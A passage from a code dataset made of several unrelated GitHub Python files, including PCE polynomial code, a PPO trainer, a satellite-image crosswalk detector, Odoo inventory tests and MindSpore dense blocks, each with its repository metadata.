outsideTemp < 0:\n currRoomTemp -= -outsideTemp\n else: \n currRoomTemp -= outsideTemp\n \n time.sleep(1 / speedup)\n\n if(ticker % 60 == 0):\n timestart += timedelta(seconds=60)\n row = [currFloorTemp,currRoomTemp,timestart]\n wrt.writerow(row)\n\n ticker+=1\n\n print(\"done\")\n\n file.close()\n \ndef datetime_to_float(d):\n \"\"\"convert datetime to time in hours\"\"\"\n epoch = t.utcfromtimestamp(0)\n total_seconds = (d - epoch).total_seconds()\n # total_seconds will be in decimals (millisecond precision)\n return total_seconds / 3600\n\n\n###basic bitch oplossing\n##tijdsfunctie zodat het lijkt alsof de kamer echt warm wordt > simulatie\n##van deltaT delen door benodigde tijd = temperatuur increment\n##startTemp + increment totdat desiredTemp is bereikt\n###advanced coolguy oplossing\n##deltaT verkleinen en de berekeningen iedere keer opnieuw uitvoeren,\n##zodat het verwarmen van de vloer invloed heeft op het verwarmen\n##van de kamer vanaf het begin van de simulatie.\n###ultieme baas oplossing\n##pak de advanced coolguy oplossing en laat hierop alle\n##verliezen en winsten uit de omgeving op los voor ultrarealism simulatie\n###EINDE ENZO","repo_name":"RK21898/WPS","sub_path":"____GARBAGE/INCINERATRON3000/heatpumpFunc.py","file_name":"heatpumpFunc.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"27377108966","text":"import math\n# from pce_predict import PcePredict\nfrom regression import regression\nfrom typing import List\n\n\ndef getPCEdegree(input):\n M = len(input)\n maxDegree = 10\n p = 1\n for p in range(1, maxDegree):\n if len(list(zip(*input))) < 3 * math.comb(M + p, p):\n if p - 1 == 0:\n return 1\n else:\n return p - 1\n return maxDegree\n\n\nclass iOrthogonalPolynomial:\n def __init__(\n self,\n name: str,\n bounds: List[float],\n degree: int,\n Aterms: List[float],\n Bterms: List[float],\n ):\n self.name = name\n self.bounds = bounds\n self.degree = degree\n self.Aterms = Aterms\n self.Bterms = Bterms\n\n\nclass Pce:\n def __init__(self, input_data, output, u_matrix, pdf, pce_degree):\n self.pce = [OutputPce(input_data, output, u_matrix, pdf, pce_degree)]\n # self.predictPce = [PcePredict(self.pce) for _ in output]\n\n\nclass OutputPce:\n def __init__(self, input_data, output, u_matrix, pdf, pce_degree):\n self.input = input_data\n self.output = output\n self.u_matrix = u_matrix\n self.input_PDF = pdf\n self.degree = getPCEdegree(input_data)\n self.uniPoly = self.get_multivariate_orthogonalPoly(pdf, pce_degree)\n self.alphaIdx = self.generateMultiIndex(\n self.degree, len(self.input_PDF))\n self.uniP_val = self.evaluated_multivariate_orthoPoly(\n self.uniPoly, self.u_matrix\n )\n self.Psi_alpha = self.compute_Psi_alpha_matrix(\n self.alphaIdx, self.uniP_val)\n self.coeffs = regression(self.output, self.Psi_alpha)\n self.cardAlpha = len(self.alphaIdx)\n\n def evaluated_multivariate_orthoPoly(\n self, multiPoly: List[iOrthogonalPolynomial], u_matrix: List[List[float]]\n ) -> List[List[List[float]]]:\n multiVariate_matrix = [] # M x Ns x P\n for i in range(len(u_matrix)):\n multiVariate_matrix.append(\n self.evaluate_univariate_orthoPoly(multiPoly[i], u_matrix[i])\n )\n\n return multiVariate_matrix\n\n def evaluate_univariate_orthoPoly(self, multiPoly, u_vector):\n univariate_matrix = [\n [\"\" for _ in range(multiPoly[\"degree\"] + 1)] for _ in range(len(u_vector))\n ]\n # univariate_matrix = [[], []] # Ns x P\n for ns in range(len(u_vector)):\n univariate_matrix[ns] = self.evaluate_orthoPoly_dataPoint(\n multiPoly[\"Aterms\"],\n multiPoly[\"Bterms\"],\n multiPoly[\"degree\"],\n u_vector[ns],\n )\n\n return univariate_matrix\n\n def evaluate_orthoPoly_dataPoint(self, Aterms, Bterms, degree, u_dataPt):\n orthoPoly_pointEvaluation = []\n orthoPoly_pointEvaluation.append(0)\n orthoPoly_pointEvaluation.append(Bterms[0])\n\n for d in range(degree):\n orthoPoly_pointEvaluation.append(\n (u_dataPt - Aterms[d])\n * (orthoPoly_pointEvaluation[d + 1] / Bterms[d + 1])\n - (orthoPoly_pointEvaluation[d] * Bterms[d]) / Bterms[d + 1]\n )\n\n return orthoPoly_pointEvaluation[1:]\n\n def compute_Psi_alpha_matrix(self, alpha, Mo):\n Ns = len(Mo[0])\n M = len(Mo)\n cardA = len(alpha)\n Psi_alpha = []\n\n for ns in range(Ns):\n Psi_alpha.append([1] * cardA)\n for cA in range(cardA):\n for m in range(M):\n deg = alpha[cA][m]\n if deg != 0:\n Psi_alpha[ns][cA] *= Mo[m][ns][deg]\n\n return Psi_alpha\n\n def generateMultiIndex(self, degree, M):\n result = []\n\n def generateHelper(curr, totalSum, remaining):\n if remaining == 0:\n result.append(curr)\n return\n\n for i in range(totalSum, -1, -1):\n next_ = curr + [i]\n generateHelper(next_, totalSum - i, remaining - 1)\n\n generateHelper([], degree, M)\n return result[::-1]\n\n def get_multivariate_orthogonalPoly(self, inputPDF, degree):\n univPoly = []\n\n for i in range(len(inputPDF)):\n if inputPDF[i].name == \"uniform\":\n univPoly.append(self.univariate_legendrePoly(degree))\n elif inputPDF[i].name == \"normal\":\n univPoly.append(self.univariate_hermitePoly(degree))\n else:\n raise ValueError(\n \"Orthogonal polynomials construction: solution not yet implemented.\"\n )\n\n return univPoly\n\n def univariate_legendrePoly(self, degree):\n a_terms = []\n b_terms = []\n\n for i in range(degree + 1):\n a_terms.append(0)\n if i == 0:\n b_terms.append(1)\n else:\n b_terms.append((1 / (4 - i ** (-2))) ** 0.5)\n\n # b_terms[0] = 1\n\n legendre_poly = {\n \"name\": \"legendre\",\n \"bounds\": [-1, 1],\n \"degree\": degree,\n \"Aterms\": a_terms,\n \"Bterms\": b_terms,\n }\n\n return legendre_poly\n\n def univariate_hermitePoly(self, degree):\n a_terms = []\n b_terms = []\n\n for i in range(degree + 1):\n a_terms.append(0)\n b_terms.append(i**0.5)\n\n b_terms[0] = 1\n\n hermite_poly = {\n \"name\": \"hermite\",\n \"bounds\": [-float(\"inf\"), float(\"inf\")],\n \"degree\": degree,\n \"Aterms\": a_terms,\n \"Bterms\": b_terms,\n }\n\n return hermite_poly\n","repo_name":"apepe91/SEGA2023","sub_path":"sensitivityAnalysis/pce.py","file_name":"pce.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"74440324153","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\" Proximal Policy Optimization implementation. \"\"\"\nfrom typing import Tuple, Optional\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom bees.rl.model import Policy\nfrom bees.rl.storage import RolloutStorage\nfrom bees.rl.algo.algo import Algo\n\n# pylint: disable=duplicate-code, too-many-arguments, too-few-public-methods\n\n\nclass PPO(Algo):\n \"\"\"\n Proximal Policy Optimization (clipped) implementation.\n\n Parameters\n ----------\n actor_critic : ``Policy``.\n The model object from ``bees.rl.model.py``.\n clip_param : ``float``.\n \"\"\"\n\n def __init__(\n self,\n actor_critic: Policy,\n clip_param: float,\n ppo_epoch: int,\n num_mini_batch: int,\n value_loss_coef: float,\n entropy_coef: float,\n lr: Optional[float] = None,\n eps: Optional[float] = None,\n max_grad_norm: Optional[float] = None,\n use_clipped_value_loss: bool = True,\n ):\n\n super(PPO, self).__init__()\n self.actor_critic = actor_critic\n\n self.clip_param = clip_param\n self.ppo_epoch = ppo_epoch\n self.num_mini_batch = num_mini_batch\n\n self.value_loss_coef = value_loss_coef\n self.entropy_coef = entropy_coef\n\n self.max_grad_norm = max_grad_norm\n self.use_clipped_value_loss = use_clipped_value_loss\n\n self.optimizer = optim.Adam(actor_critic.parameters(), lr=lr, eps=eps)\n\n def update(self, rollouts: RolloutStorage) -> Tuple[float, float, float]:\n advantages = rollouts.returns[:-1] - rollouts.value_preds[:-1]\n advantages = (advantages - advantages.mean()) / (advantages.std() + 1e-5)\n\n value_loss_epoch = 0.0\n action_loss_epoch = 0.0\n dist_entropy_epoch = 0.0\n\n for _ in range(self.ppo_epoch):\n if self.actor_critic.is_recurrent:\n data_generator = rollouts.recurrent_generator(\n advantages, self.num_mini_batch\n )\n else:\n data_generator = rollouts.feed_forward_generator(\n advantages, self.num_mini_batch\n )\n\n for sample in data_generator:\n (\n obs_batch,\n recurrent_hidden_states_batch,\n actions_batch,\n value_preds_batch,\n return_batch,\n masks_batch,\n old_action_log_probs_batch,\n adv_targ,\n ) = sample\n\n # Reshape to do in a single forward pass for all steps\n (\n values,\n action_log_probs,\n dist_entropy,\n _,\n ) = self.actor_critic.evaluate_actions(\n obs_batch, recurrent_hidden_states_batch, masks_batch, actions_batch\n )\n\n ratio = torch.exp(action_log_probs - old_action_log_probs_batch)\n surr1 = ratio * adv_targ\n surr2 = (\n torch.clamp(ratio, 1.0 - self.clip_param, 1.0 + self.clip_param)\n * adv_targ\n )\n action_loss = -torch.min(surr1, surr2).mean()\n\n if self.use_clipped_value_loss:\n value_pred_clipped = value_preds_batch + (\n values - value_preds_batch\n ).clamp(-self.clip_param, self.clip_param)\n value_losses = (values - return_batch).pow(2)\n value_losses_clipped = (value_pred_clipped - return_batch).pow(2)\n value_loss = (\n 0.5 * torch.max(value_losses, value_losses_clipped).mean()\n )\n else:\n value_loss = 0.5 * (return_batch - values).pow(2).mean()\n\n self.optimizer.zero_grad()\n (\n value_loss * self.value_loss_coef\n + action_loss\n - dist_entropy * self.entropy_coef\n ).backward()\n nn.utils.clip_grad_norm_(\n self.actor_critic.parameters(), self.max_grad_norm\n )\n self.optimizer.step()\n\n value_loss_epoch += value_loss.item()\n action_loss_epoch += action_loss.item()\n dist_entropy_epoch += dist_entropy.item()\n\n num_updates = self.ppo_epoch * self.num_mini_batch\n\n value_loss_epoch /= num_updates\n action_loss_epoch /= num_updates\n dist_entropy_epoch /= num_updates\n\n return value_loss_epoch, action_loss_epoch, dist_entropy_epoch\n","repo_name":"langfield/bees","sub_path":"bees/rl/algo/ppo.py","file_name":"ppo.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"36078279883","text":"import requests\nfrom io import BytesIO\nimport numpy as np\nimport tensorflow as tf\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nfrom object_detection.utils import ops as utils_ops\nimport os\nimport PIL\n\ndef load_image_into_numpy_array(image):\n\t# https://github.com/tensorflow/models/blob/master/research/object_detection/object_detection_tutorial.ipynb\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\ndef getURL(x, y):\n\treturn 'http://maps.google.com/maps/api/staticmap?center=' + str(y) + ',' + str(x) + '&zoom=19&size=500x500&scale=2&maptype=satellite&key=?????????'\n\ndef saveSquare(x,y):\n\t\t\tresponse =requests.get(getURL(x,y))\n\t\t\timg = Image.open(BytesIO(response.content))\n\t\t\timg = img.resize((1000,1000), PIL.Image.ANTIALIAS)\n\t\t\timgName = 'api_query.png'\n\t\t\tif os.path.isfile(imgName):\n\t\t\t\tos.remove(imgName)\n\t\t\timg.save(imgName)\n\t\t\treturn(imgName)\n\n\ndef loadModel(path_to_graph):\n\t# https://github.com/tensorflow/models/blob/master/research/object_detection/object_detection_tutorial.ipynb\n\tdetection_graph = tf.Graph()\n\twith detection_graph.as_default():\n\t\tod_graph_def = tf.GraphDef()\n\t\twith tf.gfile.GFile(path_to_graph, 'rb') as fid:\n\t\t\tserialized_graph = fid.read()\n\t\t\tod_graph_def.ParseFromString(serialized_graph)\n\t\t\ttf.import_graph_def(od_graph_def, name='')\n\treturn(detection_graph)\n\n#path_to_graph = \"Starthack/inference_graph/frozen_inference_graph.pb\"\n#detection_graph = loadModel()\n\ndef run_inference_for_single_image(image, graph):\n\t#https://github.com/tensorflow/models/blob/master/research/object_detection/object_detection_tutorial.ipynb\n with graph.as_default():\n with tf.Session() as sess:\n # Get handles to input and output tensors\n ops = tf.get_default_graph().get_operations()\n all_tensor_names = {output.name for op in ops for output in op.outputs}\n tensor_dict = {}\n for key in [\n 'num_detections', 'detection_boxes', 'detection_scores',\n 'detection_classes', 'detection_masks'\n ]:\n tensor_name = key + ':0'\n if tensor_name in all_tensor_names:\n tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(\n tensor_name)\n if 'detection_masks' in tensor_dict:\n # The following processing is only for single image\n detection_boxes = tf.squeeze(tensor_dict['detection_boxes'], [0])\n detection_masks = tf.squeeze(tensor_dict['detection_masks'], [0])\n # Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.\n real_num_detection = tf.cast(tensor_dict['num_detections'][0], tf.int32)\n detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])\n detection_masks = tf.slice(detection_masks, [0, 0, 0], [real_num_detection, -1, -1])\n detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(\n detection_masks, detection_boxes, image.shape[0], image.shape[1])\n detection_masks_reframed = tf.cast(\n tf.greater(detection_masks_reframed, 0.5), tf.uint8)\n # Follow the convention by adding back the batch dimension\n tensor_dict['detection_masks'] = tf.expand_dims(\n detection_masks_reframed, 0)\n image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')\n\n # Run inference\n output_dict = sess.run(tensor_dict,\n feed_dict={image_tensor: np.expand_dims(image, 0)})\n\n # all outputs are float32 numpy arrays, so convert types as appropriate\n output_dict['num_detections'] = int(output_dict['num_detections'][0])\n output_dict['detection_classes'] = output_dict[\n 'detection_classes'][0].astype(np.uint8)\n output_dict['detection_boxes'] = output_dict['detection_boxes'][0]\n output_dict['detection_scores'] = output_dict['detection_scores'][0]\n if 'detection_masks' in output_dict:\n output_dict['detection_masks'] = output_dict['detection_masks'][0]\n return output_dict\n\n\ndef box_extractor(boxes, scores, img_width, img_height):\n\t# ymin,xmin,ymax, xmax\n\tboxes_relevant = []\n\tbox_centers = []\n\tfor box, score in zip(boxes, scores):\n\t\tif score > 0.5:\n\t\t\tboxes_relevant.append(box)\n\t\t\tx_mean = (box[1] + box[3])/2\n\t\t\ty_mean = (box[0] + box[2])/2\n\t\t\tbox_centers.append([x_mean * img_width, y_mean * img_height])\n\treturn(box_centers)\n\n\ndef cwClassification(x,y, inference_graph):\n\timgName = saveSquare(x,y)\n\tIMAGE_SIZE = (8, 8)\n\tPATH_TO_LABELS = \"../configs_labels/label_map.pbtxt\"\n\tNUM_CLASSES = 1\n\n\tlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\n\tcategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\n\tcategory_index = label_map_util.create_category_index(categories)\n\n\timage = Image.open(imgName)\n\twidth = image.width\n\theight = image.height\n\tcenter_img = [width/2, height/2]\n\timage = image.convert('RGB')\n\t#image.save('test.jpg')\n\timg_np = load_image_into_numpy_array(image)\n\toutput_dict = run_inference_for_single_image(img_np, inference_graph)\n\n\tvis_util.visualize_boxes_and_labels_on_image_array(\n\t\timg_np,\n\t\toutput_dict['detection_boxes'],\n\t\toutput_dict['detection_classes'],\n\t\toutput_dict['detection_scores'],\n\t\tcategory_index,\n\t\tinstance_masks=output_dict.get('detection_masks'),\n\t\tuse_normalized_coordinates=True,\n\t\tline_thickness=6)\n\tplt.figure(figsize=IMAGE_SIZE)\n\tplt.imshow(img_np)\n\toutFile = 'classification.png'\n\tif os.path.isfile(outFile):\n\t\tos.remove(outFile)\n\tplt.savefig(outFile)\n\n\tcenters = box_extractor(output_dict['detection_boxes'], output_dict['detection_scores'], width, height)\n\tdef getClosestCW(points):\n\t\tdist_min = 100000000\n\t\tfor point in points:\n\t\t\tdist = ((point[0] - center_img[0])**2 + (point[1] - center_img[1])**2)**0.5\n\t\t\tif(dist_min > dist):\n\t\t\t\tdist_min = dist\n\t\t\t\tpoint_min = point\n\t\treturn(point_min)\n\tclosestCW = getClosestCW(centers)\n\n\tgeo_codConsy = 0.000005614 * 0.175\n\tgeo_codConsx = 0.000005614 * 0.2325\n\tx_dist = (closestCW[0] - center_img[0]) * geo_codConsx\n\ty_dist = -(closestCW[1] - center_img[1]) * geo_codConsy\n\n\tcw_geoCodx = x + x_dist\n\tcw_geoCody = y + y_dist\n\treturn(cw_geoCody.item(), cw_geoCodx.item())\n\n\n\n#x = 7.4296\n#y= 46.9432\n\n#xy = cwClassification(x,y, detection_graph)\n\n\n","repo_name":"joelgschwind/Starthack","sub_path":"API/classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":6424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"23577806845","text":"from django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('chat', '0005_auto_20161128_0759'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='chat',\n name='timestamp',\n field=models.DateTimeField(auto_now_add=True),\n ),\n ]\n","repo_name":"cjlee112/socraticqs2","sub_path":"mysite/chat/migrations/0006_auto_20170117_0513.py","file_name":"0006_auto_20170117_0513.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"95"} +{"seq_id":"23731034625","text":"import numpy as np\nimport sys\nfrom typing import List\n\n\ndef dna_oligomers(num_bp: int,omit_equiv=True) -> List[str]:\n uo = UniqueOligomers(omit_equiv=omit_equiv)\n return uo.get_oligomers(num_bp)\n\nclass UniqueOligomers:\n def __init__(self, omit_equiv: bool=True):\n self.bases = 'atcg'\n self.omit_equiv = omit_equiv\n\n def get_oligomers(self, num_bp):\n self.seqlist = []\n self._seqloop('', 0, num_bp)\n return self.seqlist\n\n def _seqloop(self, seq: str, current: int, num_bp: int):\n current += 1\n for i in range(len(self.bases)):\n new_seq = seq + self.bases[i]\n if current < num_bp:\n self._seqloop(new_seq, current, num_bp)\n else:\n if not (self.omit_equiv and self.invert_seq(new_seq) in self.seqlist):\n self.seqlist.append(new_seq)\n\n def invert_seq(self, seq: str):\n comp_dict = {'a': 't', 't': 'a', 'c': 'g', 'g': 'c'}\n return ''.join(comp_dict[base] for base in seq[::-1])\n\n def get_mid_dimer(self, seq: str):\n if len(seq) % 2 == 0:\n unique_dimers = sorted(self.get_oligomers(2))\n dimer = seq[len(seq)//2-1:len(seq)//2+1]\n if dimer not in unique_dimers:\n dimer = self.invert_seq(dimer)\n seq = self.invert_seq(seq)\n return dimer, seq\n return '', seq\n \ndef complementary_sequence(sequence: str):\n comp_dict = {'a': 't', 't': 'a', 'c': 'g', 'g': 'c'}\n return ''.join(comp_dict[base] for base in sequence.lower()[::-1])\n\n\nif __name__ == \"__main__\":\n \n if len(sys.argv) < 2:\n print(\"usage: %s N\"%sys.argv[0])\n sys.exit()\n \n N = int(sys.argv[1])\n bases = \"atcg\"\n if len(sys.argv) >= 3:\n bases = sys.argv[2]\n \n uo = UniqueOligomers(bases=bases)\n olis = uo.get_oligomers(N)\n \n print(len(olis))\n #~ for oli in olis:\n #~ print(oli)\n \n \n \n","repo_name":"eskoruppa/IOPolyMC","sub_path":"iopolymc/unique_oligomers.py","file_name":"unique_oligomers.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70849573114","text":"# -*- coding: utf-8 -*- \r\nimport clr\r\nclr.AddReference(\"System\")\r\nclr.AddReference(\"Feng.Base\");\r\nclr.AddReference(\"Feng.Windows.Application\");\r\nclr.AddReference(\"Zkzx.Model.Dao\")\r\nimport Feng;\r\nimport Zkzx.Model;\r\n\r\nclass 专家任务管理(object):\r\n @staticmethod\r\n def 撤销专家任务的车辆作业监控(masterForm):\r\n entity = masterForm.DisplayManager.CurrentItem;\r\n if (entity == None or entity.车辆作业 == None): \r\n Feng.MessageForm.ShowWarning(\"还未开始监控,不需撤销!\");\r\n return;\r\n\r\n #if (entity.车辆作业.结束时间 != None):\r\n # Feng.MessageForm.ShowWarning(\"专家任务的车辆作业监控已结束,无法撤销!\");\r\n # return;\r\n\r\n Zkzx.Model.车辆作业Dao().撤销监控(entity.车辆作业);\r\n Feng.MessageForm.ShowInfo(\"撤销成功。\");\r\n Feng.Grid.UnBoundGridExtention.ResetRowData(masterForm.MasterGrid, masterForm.MasterGrid.CurrentDataRow);\r\n\r\n @staticmethod\r\n def 撤销专家任务的车辆作业(masterForm):\r\n entity = masterForm.DisplayManager.CurrentItem;\r\n if (entity == None or entity.车辆作业 == None): \r\n Feng.MessageForm.ShowWarning(\"还未有作业,不需撤销!\");\r\n return;\r\n\r\n if (entity.车辆作业.开始时间 != None):\r\n Feng.MessageForm.ShowWarning(\"专家任务的车辆作业已开始监控,请先撤销监控!\");\r\n return;\r\n\r\n Zkzx.Model.车辆作业Dao().撤销车辆作业(entity.车辆作业);\r\n Feng.MessageForm.ShowInfo(\"撤销成功。\");\r\n Feng.Grid.UnBoundGridExtention.ResetRowData(masterForm.MasterGrid, masterForm.MasterGrid.CurrentDataRow);\r\n\r\n @staticmethod\r\n def 撤销专家任务下达(masterForm):\r\n entity = masterForm.DisplayManager.CurrentItem;\r\n if (entity == None or entity.下达时间 == None):\r\n Feng.MessageForm.ShowWarning(\"还未下达,不需撤销!\");\r\n return;\r\n\r\n if (entity.车辆作业 != None):\r\n Feng.MessageForm.ShowWarning(\"专家任务已安排车辆作业,请先撤销车辆作业!\");\r\n return;\r\n\r\n entity.下达时间 = None;\r\n Zkzx.Model.专家任务Dao().Update(entity);\r\n Feng.MessageForm.ShowInfo(\"撤销成功。\");\r\n Feng.Grid.UnBoundGridExtention.ResetRowData(masterForm.MasterGrid, masterForm.MasterGrid.CurrentDataRow);","repo_name":"zephyrrr/mERP-ZKZX","sub_path":"Zkzx.Script/专家任务管理.py","file_name":"专家任务管理.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"28919506540","text":"import math\n\nnumber = 600851475143\n\ndef maxPrime(n):\n upper_limit_factor = math.ceil(n**0.5)\n for i in range(2, upper_limit_factor):\n if n%i ==0:\n upper_limit_prime = math.ceil(i**0.5)\n for j in range(2,upper_limit_prime):\n if i%j ==0:\n break\n else:\n max_prime = i\n return max_prime\n\nprint(maxPrime(number))\n","repo_name":"Malith-19/Euler","sub_path":"Problem 3 - method 2.py","file_name":"Problem 3 - method 2.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33369586996","text":"from datetime import date\nfrom odoo.tests.common import TransactionCase\n\n\nclass TestStockProductsValuationFinal(TransactionCase):\n\n def setUp(self):\n super().setUp()\n self.StockProductsValuationFinal = self.env[\"ple.stock.products.valuation.final\"]\n\n def test_compute_total_value(self):\n \"Check _compute_total_value method\"\n quantity_product_hand = 10.0\n standard_price = 20.0\n expected_total_value = quantity_product_hand * standard_price\n product_valuation_final = self.StockProductsValuationFinal.create({\n 'quantity_product_hand': quantity_product_hand,\n 'standard_price': standard_price,\n })\n self.assertEqual(product_valuation_final.total_value,\n expected_total_value)\n\n print(\"Test compute_total_value StockProductsValuationFinal OK ...... !!!!\")\n print(\"======================== Test StockProductsValuationFinal OK ========================\")\n\n\nclass TestPlePermanentFinal(TransactionCase):\n\n def setUp(self):\n super().setUp()\n self.PlePermanentFinal = self.env[\"ple.permanent.inventory.physical.units\"]\n\n def test_generete_ending_balances(self):\n \"Check generete_ending_balances method\"\n date_start = date(2023, 1, 1)\n date_end = date(2023, 12, 31)\n company_id = 1\n inventory = self.PlePermanentFinal.create({\n 'date_start': date_start,\n 'date_end': date_end,\n 'company_id': company_id,\n 'state': 'load',\n 'state_send': '1',\n\n })\n inventory.generete_ending_balances()\n\n print(\"Test generete_ending_balances PlePermanentFinal OK ...... !!!!\")\n\n def test_opening_balances(self):\n \"Check opening_balances method\"\n product = 1\n quantity_hand = {\n 'quantity_product_hand': 10.0,\n 'product_valuation': 'Product A',\n 'udm_product': 'uom',\n 'standard_price': 20.0,\n 'total_value': 200.0,\n 'code_exist': 1,\n }\n year = '2023'\n month = '01'\n day = '01'\n correct_name = 'Product A'\n inventory = self.PlePermanentFinal.create({\n 'state': 'draft',\n 'state_send': '1',\n 'date_start': '2021-01-01',\n 'date_end': '2021-01-31',\n })\n inventory.opening_balances(\n product, quantity_hand, year, month, day, correct_name=correct_name\n )\n\n print(\"Test opening_balances PlePermanentFinal OK ...... !!!!\")\n print('======================== Test PlePermanentFinal OK ========================')\n","repo_name":"metcom-dev/metcom","sub_path":"ple_permanent_inventory_in_physical_units/tests/test_ple_permanent_final.py","file_name":"test_ple_permanent_final.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41880542681","text":"from __future__ import absolute_import\n\nimport math\nimport numpy as np\n\nimport mindspore.ops as ops\nimport mindspore.nn as nn\nimport mindspore.common.dtype as mstype\nfrom mindspore import Tensor, Parameter\nfrom mindspore.ops.primitive import constexpr\n\nfrom .activation import get_activation\nfrom ..utils.check_func import check_param_type\n\n__all__ = ['LinearBlock', 'ResBlock', 'InputScale',\n 'FCSequential', 'MultiScaleFCSequential']\n\n\n@constexpr\ndef _check_dense_input_shape(x, prim_name=None):\n msg_prefix = f\"For '{prim_name}', the\" if prim_name else \"The\"\n if len(x) < 2:\n raise ValueError(\n f\"{msg_prefix} dimension of 'x' should not be less than 2, but got {len(x)}.\")\n\n\nclass LinearBlock(nn.Cell):\n r\"\"\"\n The LinearBlock. Applies a linear transformation to the incoming data.\n\n Args:\n in_channels (int): The number of channels in the input space.\n out_channels (int): The number of channels in the output space.\n weight_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable weight_init parameter. The dtype\n is same as input `input` . For the values of str, refer to the function `mindspore.common.initializer`.\n Default: ``\"normal\"``.\n bias_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable bias_init parameter. The dtype is\n same as input `input` . The values of str refer to the function `mindspore.common.initializer`.\n Default: ``\"zeros\"``.\n has_bias (bool): Specifies whether the layer uses a bias vector. Default: ``True``.\n activation (Union[str, Cell, Primitive, None]): activate function applied to the output of the fully connected\n layer. Default: ``None``.\n\n Inputs:\n - **input** (Tensor) - Tensor of shape :math:`(*, in\\_channels)`.\n\n Outputs:\n Tensor of shape :math:`(*, out\\_channels)`.\n\n Supported Platforms:\n ``Ascend`` ``GPU``\n\n Examples:\n >>> import numpy as np\n >>> from mindflow.cell import LinearBlock\n >>> from mindspore import Tensor\n >>> input = Tensor(np.array([[180, 234, 154], [244, 48, 247]], np.float32))\n >>> net = LinearBlock(3, 4)\n >>> output = net(input)\n >>> print(output.shape)\n (2, 4)\n\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n weight_init='normal',\n bias_init='zeros',\n has_bias=True,\n activation=None):\n super(LinearBlock, self).__init__()\n self.activation = get_activation(activation) if isinstance(\n activation, str) else activation\n self.dense = nn.Dense(in_channels,\n out_channels,\n weight_init=weight_init,\n bias_init=bias_init,\n has_bias=has_bias,\n activation=self.activation)\n\n def construct(self, x):\n out = self.dense(x)\n return out\n\n\nclass ResBlock(nn.Cell):\n r\"\"\"\n The ResBlock of dense layer.\n\n Args:\n in_channels (int): The number of channels in the input space.\n out_channels (int): The number of channels in the output space.\n weight_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable weight_init parameter. The dtype\n is same as input x. The values of str refer to the function `initializer`. Default: ``'normal'``.\n bias_init (Union[Tensor, str, Initializer, numbers.Number]): The trainable bias_init parameter. The dtype is\n same as input x. The values of str refer to the function `initializer`. Default: ``'zeros'``.\n has_bias (bool): Specifies whether the layer uses a bias vector. Default: ``True``.\n activation (Union[str, Cell, Primitive, None]): activate function applied to the output of the dense layer.\n Default: ``None``.\n weight_norm (bool): Whether to compute the sum of squares of weight. Default: ``False``.\n\n Inputs:\n - **input** (Tensor) - Tensor of shape :math:`(*, in\\_channels)`.\n\n Outputs:\n Tensor of shape :math:`(*, out\\_channels)`.\n\n Raises:\n ValueError: If `in_channels` not equal out_channels.\n TypeError: If `activation` is not in str or Cell or Primitive.\n\n Supported Platforms:\n ``Ascend`` ``GPU``\n\n Examples:\n >>> import numpy as np\n >>> from mindflow.cell import ResBlock\n >>> from mindspore import Tensor\n >>> input = Tensor(np.array([[180, 234, 154], [244, 48, 247]], np.float32))\n >>> net = ResBlock(3, 3)\n >>> output = net(input)\n >>> print(output.shape)\n (2, 3)\n\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n weight_init='normal',\n bias_init='zeros',\n has_bias=True,\n activation=None,\n weight_norm=False):\n super(ResBlock, self).__init__()\n check_param_type(in_channels, \"in_channels\",\n data_type=int, exclude_type=bool)\n check_param_type(out_channels, \"out_channels\",\n data_type=int, exclude_type=bool)\n if in_channels != out_channels:\n raise ValueError(\"in_channels of ResBlock should be equal of out_channels, but got in_channels: {}, \"\n \"out_channels: {}\".format(in_channels, out_channels))\n self.dense = LinearBlock(in_channels,\n out_channels,\n weight_init=weight_init,\n bias_init=bias_init,\n has_bias=has_bias,\n activation=None)\n self.activation = get_activation(activation) if isinstance(\n activation, str) else activation\n if activation is not None and not isinstance(self.activation, (nn.Cell, ops.Primitive)):\n raise TypeError(\n \"The activation must be str or Cell or Primitive,\"\" but got {}.\".format(type(activation)))\n if not activation:\n self.activation = ops.Identity()\n\n def construct(self, x):\n out = self.activation(self.dense(x) + x)\n return out\n\n\ndef _bias_init(fan_in, fan_out):\n \"\"\"initializer 